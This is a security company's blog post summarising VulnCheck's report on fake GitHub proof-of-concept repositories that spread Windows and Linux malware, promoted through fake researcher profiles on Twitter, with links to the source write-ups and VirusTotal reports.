Project Hyphae
Search

GitHub for Zero-Day Malware Distribution

Share This Post

Threat actors posing as Security Professionals have been using GitHub to distribute malware to unsuspecting victims. Security Firm VulnCheck has identified GitHub repositories that appear to contain Proof-Of-Concept for zero-day exploits for popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange, they instead download a Python script named poc.py which is simply a downloader for Linux and Windows systems. The poc.py script downloads a ZIP file from the internet based on the OS installed, then extracts the ZIP, and executes the payload. The Windows payload has a high detection rate (36/61) on VirusTotal as a password stealing trojan, while the Linux payload was only flagged by three scanners (now flagged by 24/61). Both the Linux and Windows ZIP files contain a TOR Client as part of their install.

The threat actors, in an attempt to gain traffic to their GitHub repositories, have created Twitter accounts for fake employees of fictitious Cyber Security Firm High Sierra Cyber Security. These accounts appear legitimate with security news posts, followers, and even stolen headshots from real security researchers at well known security firms. They then post about the new zero-day they have discovered and direct the reader to download the proof-of-concept from GitHub.

While the efficiency of using Twitter and GitHub to persuade victims to download malware isn’t clear yet, there are indicators that the threat actors are having some success. When VulnCheck reported to GitHub the malicious nature of the repositories and got them taken down, the threat actors quickly set up new repositories and began directing their Twitter readers to the new repositories.

VulnCheck’s blog post of their findings: https://vulncheck.com/blog/fake-repos-deliver-malicious-implant

Bleeping Computer article about VulnCheck’s findings: https://www.bleepingcomputer.com/news/security/fake-zero-day-poc-exploits-on-github-push-windows-linux-malware/

VirusTotal report for Windows payload: https://www.virustotal.com/gui/file/777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4

VirusTotal report for Linux payload: https://www.virustotal.com/gui/file/ba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733/detection



Reach out to our incident response team for help

More To Explore

Information Security News – 5/12/2025

Microsoft Sets Passkeys Default for New Accounts Article Link: https://thehackernews.com/2025/05/microsoft-sets-passkeys-default-for-new.html Accenture: What We Learned When Our CEO Got Deepfaked Article Link: https://www.computing.co.uk/event/2025/accenture-what-we-learned-when-our-ceo-got-deepfaked Ghost Students Creating

Marcus Cylar May 12, 2025

Information Security News – 5/5/2025

Cloudflare Sees a Big Jump in DDoS Attacks Article Link: https://www.bleepingcomputer.com/news/security/cloudflare-mitigates-record-number-of-ddos-attacks-in-2025/ Bring Your Own Computer Trend Gives Cyber Pros Chills, Yet It’s Here to Stay

Jo Moldenhauer May 5, 2025

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.